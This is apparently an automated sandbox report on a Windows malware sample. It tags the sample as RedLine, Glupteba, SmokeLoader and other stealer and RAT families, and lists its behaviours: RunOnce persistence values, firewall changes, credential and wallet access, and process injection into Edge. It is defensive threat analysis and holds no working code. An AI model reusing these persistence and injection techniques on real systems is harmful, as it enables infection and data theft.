Malware Analysis Report

2025-01-02 05:02

Sample ID 231111-lxqfkach7v
Target 2a514d14cf0c18516696437e608ab3e2.exe
SHA256 bf747d7d7e3824b80a05d2988b5163729fb1b8c280f4ea5e2d638ab421f5c9d4
Tags
glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor paypal dropper evasion infostealer loader persistence phishing rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bf747d7d7e3824b80a05d2988b5163729fb1b8c280f4ea5e2d638ab421f5c9d4

Threat Level: Known bad

The file 2a514d14cf0c18516696437e608ab3e2.exe was found to be: Known bad.

Malicious Activity Summary

glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor paypal dropper evasion infostealer loader persistence phishing rat spyware stealer trojan

SectopRAT payload

Mystic

RedLine payload

SectopRAT

Glupteba

Detect ZGRat V1

RedLine

SmokeLoader

Detect Mystic stealer payload

Glupteba payload

ZGRat

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

AutoIT Executable

Detected potential entity reuse from brand paypal.

Launches sc.exe

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: MapViewOfSection

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 09:54

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 09:54

Reported

2023-11-11 09:57

Platform

win10v2004-20231023-en

Max time kernel

82s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2a514d14cf0c18516696437e608ab3e2.exe"

Signatures

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2231940048-779848787-2990559741-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\392.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\D50E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D50E.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\2a514d14cf0c18516696437e608ab3e2.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\D667.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6C0.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\970.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 760 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\2a514d14cf0c18516696437e608ab3e2.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe
PID 760 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\2a514d14cf0c18516696437e608ab3e2.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe
PID 760 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\2a514d14cf0c18516696437e608ab3e2.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe
PID 4704 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe
PID 4704 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe
PID 4704 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe
PID 452 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe
PID 452 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe
PID 452 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe
PID 2980 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe
PID 2980 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe
PID 2980 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe
PID 4972 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2104 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2104 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2312 wrote to memory of 880 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 2020 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2312 wrote to memory of 880 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 2020 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4476 wrote to memory of 2740 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4476 wrote to memory of 2740 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 956 wrote to memory of 4872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 956 wrote to memory of 4872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4920 wrote to memory of 960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4920 wrote to memory of 960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2516 wrote to memory of 704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2516 wrote to memory of 704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
